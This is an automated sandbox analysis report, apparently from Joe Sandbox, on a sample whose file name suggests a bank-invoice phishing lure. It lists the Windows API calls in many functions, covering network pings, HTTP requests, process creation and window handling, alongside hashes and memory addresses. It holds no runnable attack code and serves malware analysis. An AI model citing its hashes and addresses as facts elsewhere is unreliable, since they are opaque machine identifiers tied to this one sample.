                    • Opcode Fuzzy Hash: c651f56bdc15ebc8e93dd245c55980f0f8d979b8294b383da98a5b84f3eb97e8
                    • Instruction Fuzzy Hash: F2619874608215AFC710EF64C848F6BBBE8AF49718F00441EF9859B291C778ED58CB9B
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 004C8168
                    • inet_addr.WSOCK32(?,?,?), ref: 004C81AD
                    • gethostbyname.WSOCK32(?), ref: 004C81B9
                    • IcmpCreateFile.IPHLPAPI ref: 004C81C7
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004C8237
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004C824D
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004C82C2
                    • WSACleanup.WSOCK32 ref: 004C82C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 099e08b9e1c7e677554c66982a675ba043e504be4115385813885069df79c1b9
                    • Instruction ID: d9286cc64250aaa602c9c6b65e300c61eafe307908b3b3d434d94dc07e53a0bd
                    • Opcode Fuzzy Hash: 099e08b9e1c7e677554c66982a675ba043e504be4115385813885069df79c1b9
                    • Instruction Fuzzy Hash: D851A1356046009FD760EF25CC89F6AB7E5EF48314F04886EF959DB2A1DB78E901CB4A
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BE396
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004BE40C
                    • GetLastError.KERNEL32 ref: 004BE416
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 004BE483
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 5596304401d93cf412b2ac8caed03f282f8aaa79ab0176f438f6f715e7e04eed
                    • Instruction ID: 6c45c27b48bdc6f961fc2642aa08058fae50b24e27faa902c794d9d8491691b7
                    • Opcode Fuzzy Hash: 5596304401d93cf412b2ac8caed03f282f8aaa79ab0176f438f6f715e7e04eed
                    • Instruction Fuzzy Hash: 6531C835A002059FDB00DF59D985AFEBBB4FF85304F14806BE505E7291DB789D02CB65
                    APIs
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004AB98C
                    • GetDlgCtrlID.USER32 ref: 004AB997
                    • GetParent.USER32 ref: 004AB9B3
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004AB9B6
                    • GetDlgCtrlID.USER32(?), ref: 004AB9BF
                    • GetParent.USER32(?), ref: 004AB9DB
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004AB9DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent
                    • String ID: ComboBox$ListBox
                    • API String ID: 1383977212-1403004172
                    • Opcode ID: 3b50da34b83de08411deca963df9ed9e27c7aac7dd7a8b0e31ae632d0beaacca
                    • Instruction ID: 15aec7effe6380486227e9f793a5f6ac01510301cd6519721891a2c9aa2c357f
                    • Opcode Fuzzy Hash: 3b50da34b83de08411deca963df9ed9e27c7aac7dd7a8b0e31ae632d0beaacca
                    • Instruction Fuzzy Hash: 0221C4B4900104BFDB04ABA1DC85EFEBB79EF5A300F10411AF551972D2DB785825DB68
                    APIs
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004ABA73
                    • GetDlgCtrlID.USER32 ref: 004ABA7E
                    • GetParent.USER32 ref: 004ABA9A
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004ABA9D
                    • GetDlgCtrlID.USER32(?), ref: 004ABAA6
                    • GetParent.USER32(?), ref: 004ABAC2
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004ABAC5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent
                    • String ID: ComboBox$ListBox
                    • API String ID: 1383977212-1403004172
                    • Opcode ID: 68d17388a97cd475d14e9f3a6311acaa3fb31cbe2585f5aacc3097647faee5a6
                    • Instruction ID: a28b5fe0c65168efe04f7ec22aec5a69b1187fc7963b7a54349f913e3a4e521e
                    • Opcode Fuzzy Hash: 68d17388a97cd475d14e9f3a6311acaa3fb31cbe2585f5aacc3097647faee5a6
                    • Instruction Fuzzy Hash: 7121C574D00104BFDB01ABA4CC85EFEBB75EF56304F10401AF551D7292DBB95925DB68
                    APIs
                    • GetParent.USER32 ref: 004ABAE3
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 004ABAF8
                    • _wcscmp.LIBCMT ref: 004ABB0A
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004ABB85
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 0f69029bdcb04a56feb317c63541dea2dccc33ae44591245f1c7fce41f4ebec4
                    • Instruction ID: 0e0123283138cd35e79cce62306d1c15132222b9bdc36314abc216c195df8707
                    • Opcode Fuzzy Hash: 0f69029bdcb04a56feb317c63541dea2dccc33ae44591245f1c7fce41f4ebec4
                    • Instruction Fuzzy Hash: 9211C876608302F9FA106621AC06DA63B59DF22324F100027F904E58DAFBA96951456C
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004CB2D5
                    • CoInitialize.OLE32(00000000), ref: 004CB302
                    • CoUninitialize.OLE32 ref: 004CB30C
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 004CB40C
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 004CB539
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 004CB56D
                    • CoGetObject.OLE32(?,00000000,004FD91C,?), ref: 004CB590
                    • SetErrorMode.KERNEL32(00000000), ref: 004CB5A3
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004CB623
                    • VariantClear.OLEAUT32(004FD91C), ref: 004CB633
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID:
                    • API String ID: 2395222682-0
                    • Opcode ID: 204e90fe3f352d6f0d253bfb1d1ef7f474ec1b9b5165598d358dc22f4a1f8937
                    • Instruction ID: 750d58700cfc1d4a543d5d41a0a792d2065a5c9a405dacf5e6b350d3c36882e5
                    • Opcode Fuzzy Hash: 204e90fe3f352d6f0d253bfb1d1ef7f474ec1b9b5165598d358dc22f4a1f8937
                    • Instruction Fuzzy Hash: 9DC12375608300AFC740DF65C885A6BB7E9FF88308F00495EF98A9B251DB74ED05CB96
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 004B4047
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B405B
                    • GetWindowThreadProcessId.USER32(00000000), ref: 004B4062
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004B30A5,?,00000001), ref: 004B4071
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004B4083
                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004B30A5,?,00000001), ref: 004B409C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004B30A5,?,00000001), ref: 004B40AE
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B40F3
                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B4108
                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004B30A5,?,00000001), ref: 004B4113
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 56788841447045125e984d82b31114eceabdaf3ac5c121d7087d4c7e048e9f3a
                    • Instruction ID: 3eb72eec730ec369cebb942fda9a38b8cd0e45caae53ef15692886d11f868da0
                    • Opcode Fuzzy Hash: 56788841447045125e984d82b31114eceabdaf3ac5c121d7087d4c7e048e9f3a
                    • Instruction Fuzzy Hash: DE318171900208ABEB10DB58DC49BBA77AAEFA4311F108016F904D7391CBB89D94CB78
                    APIs
                    • GetSysColor.USER32(00000008), ref: 0048B496
                    • SetTextColor.GDI32(?,000000FF), ref: 0048B4A0
                    • SetBkMode.GDI32(?,00000001), ref: 0048B4B5
                    • GetStockObject.GDI32(00000005), ref: 0048B4BD
                    • GetClientRect.USER32(?), ref: 004EDD63
                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 004EDD7A
                    • GetWindowDC.USER32(?), ref: 004EDD86
                    • GetPixel.GDI32(00000000,?,?), ref: 004EDD95
                    • ReleaseDC.USER32(?,00000000), ref: 004EDDA7
                    • GetSysColor.USER32(00000005), ref: 004EDDC5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                    • String ID:
                    • API String ID: 3430376129-0
                    • Opcode ID: ac56207c3e686ef11a2325903b3d87e2986305a8cdf432541a8dda3962b04945
                    • Instruction ID: d1ead2bff98ede219cb395d07fad254a82b730d98656453b7a62fa73d34efa68
                    • Opcode Fuzzy Hash: ac56207c3e686ef11a2325903b3d87e2986305a8cdf432541a8dda3962b04945
                    • Instruction Fuzzy Hash: 30117F31900205BFDB116F64EC09BBE3B66EB05721F104632FA66951E2CB310961EB29
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004730DC
                    • CoUninitialize.OLE32(?,00000000), ref: 00473181
                    • UnregisterHotKey.USER32(?), ref: 004732A9
                    • DestroyWindow.USER32(?), ref: 004E5079
                    • FreeLibrary.KERNEL32(?), ref: 004E50F8
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004E5125
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 76b7fb3fcefa3fc26b6ee5c0fb0a84ef1ceeb88830b04fe4052fbcaa2eafadf8
                    • Instruction ID: 28408262a5c7e7eb8012df088e55663596791854cef6b657a9d6e5ccda06fcfd
                    • Opcode Fuzzy Hash: 76b7fb3fcefa3fc26b6ee5c0fb0a84ef1ceeb88830b04fe4052fbcaa2eafadf8
                    • Instruction Fuzzy Hash: 8C914F306001428FC719EF15C995AA9F3B4FF0530AF5481AEF50A67262DF38AE56DF58
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 0048CC15
                      • Part of subcall function 0048CCCD: GetClientRect.USER32(?,?), ref: 0048CCF6
                      • Part of subcall function 0048CCCD: GetWindowRect.USER32(?,?), ref: 0048CD37
                      • Part of subcall function 0048CCCD: ScreenToClient.USER32(?,?), ref: 0048CD5F
                    • GetDC.USER32 ref: 004ED137
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004ED14A
                    • SelectObject.GDI32(00000000,00000000), ref: 004ED158
                    • SelectObject.GDI32(00000000,00000000), ref: 004ED16D
                    • ReleaseDC.USER32(?,00000000), ref: 004ED175
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004ED200
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 2f71928379b9a09ba6500750e14ea478311f805389bd9b32a45b9afb49c28a09
                    • Instruction ID: 9edcd9920543e034943485df8e240e9c3210293233f9fae5483d7ac0fc937cf1
                    • Opcode Fuzzy Hash: 2f71928379b9a09ba6500750e14ea478311f805389bd9b32a45b9afb49c28a09
                    • Instruction Fuzzy Hash: 89711130800244DFCF21AF65C881ABE7BB1FF48316F18466BED555A3A6C7398842DF69
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                      • Part of subcall function 0048B63C: GetCursorPos.USER32(000000FF), ref: 0048B64F
                      • Part of subcall function 0048B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0048B66C
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000001), ref: 0048B691
                      • Part of subcall function 0048B63C: GetAsyncKeyState.USER32(00000002), ref: 0048B69F
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 004DED3C
                    • ImageList_EndDrag.COMCTL32 ref: 004DED42
                    • ReleaseCapture.USER32 ref: 004DED48
                    • SetWindowTextW.USER32(?,00000000), ref: 004DEDF0
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004DEE03
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 004DEEDC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 1924731296-2107944366
                    • Opcode ID: 8fd13e67065a4d65a4c9ca05e68dc38c5b6f4c20f2be58b5db85f39fcf31e5c3
                    • Instruction ID: f551a6143d5af259d33d563dd6bb1cb333027b338c7772b6634d536a53102b8f
                    • Opcode Fuzzy Hash: 8fd13e67065a4d65a4c9ca05e68dc38c5b6f4c20f2be58b5db85f39fcf31e5c3
                    • Instruction Fuzzy Hash: 82519B70204300AFD710EF65DC96FAE77E5FB88708F00492EF5959A2E2DB749918CB5A
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004C45FF
                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004C462B
                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 004C466D
                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004C4682
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C468F
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004C46BF
                    • InternetCloseHandle.WININET(00000000), ref: 004C4706
                      • Part of subcall function 004C5052: GetLastError.KERNEL32(?,?,004C43CC,00000000,00000000,00000001), ref: 004C5067
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                    • String ID:
                    • API String ID: 1241431887-3916222277
                    • Opcode ID: 19dd582c07fa51463179bb92aedf5d6689681a08ddc6118744f51145a1d4b731
                    • Instruction ID: 25d40b352a6cebc979019575e62d3e3a070f5c80c199d3c30a5172ff1b5eb693
                    • Opcode Fuzzy Hash: 19dd582c07fa51463179bb92aedf5d6689681a08ddc6118744f51145a1d4b731
                    • Instruction Fuzzy Hash: 7F418EB5A01205BFEB019F50CD95FBB77ACEF49314F00402AFA019A245D7B899448BA8
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0050DC00), ref: 004CB715
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0050DC00), ref: 004CB749
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004CB8C1
                    • SysFreeString.OLEAUT32(?), ref: 004CB8EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: d5c9e297ea2fe62adf7adf895627cc3adbf8103cc5f9bf13dda04a7f1709b22b
                    • Instruction ID: 03855488237563454892b09398c291a1cf44c42b49d7d44d5759cc6a435cf0a7
                    • Opcode Fuzzy Hash: d5c9e297ea2fe62adf7adf895627cc3adbf8103cc5f9bf13dda04a7f1709b22b
                    • Instruction Fuzzy Hash: 8AF13975A00209AFCF44DF94C885EAEB7B9FF48315F10845EF945AB250DB35AE42CBA4
                    APIs
                    • _memset.LIBCMT ref: 004D24F5
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004D2688
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004D26AC
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004D26EC
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004D270E
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004D286F
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004D28A1
                    • CloseHandle.KERNEL32(?), ref: 004D28D0
                    • CloseHandle.KERNEL32(?), ref: 004D2947
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: e77599fceb11fb11226ea729ed6b599ace845ac9d4eefd431091c0cee0f6fd5a
                    • Instruction ID: 125f38564b6b7304c4e0f1f62922e8f0a4d3892317d5534e0e4bc23d85cbd48d
                    • Opcode Fuzzy Hash: e77599fceb11fb11226ea729ed6b599ace845ac9d4eefd431091c0cee0f6fd5a
                    • Instruction Fuzzy Hash: F7D1C131604200DFCB14EF25C5A1A6EBBE1AF94314F14896FF8895B3A2DB79DC01CB5A
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004DB3F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: f28b402698c744363654dc833df0c735ee492bd0d8b5abdc3bbe36d0f3403d3c
                    • Instruction ID: 92819deb1aaf07b698e48556bd630ca830298dae7b8a6139d5bdf6b3a10c573b
                    • Opcode Fuzzy Hash: f28b402698c744363654dc833df0c735ee492bd0d8b5abdc3bbe36d0f3403d3c
                    • Instruction Fuzzy Hash: 7B51A330500204FBEF209F298CA9BAE3BA5EB05318F654117FA15D63E1CB79E950DBD9
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 004EDB1B
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004EDB3C
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004EDB51
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 004EDB6E
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004EDB95
                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0048A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 004EDBA0
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004EDBBD
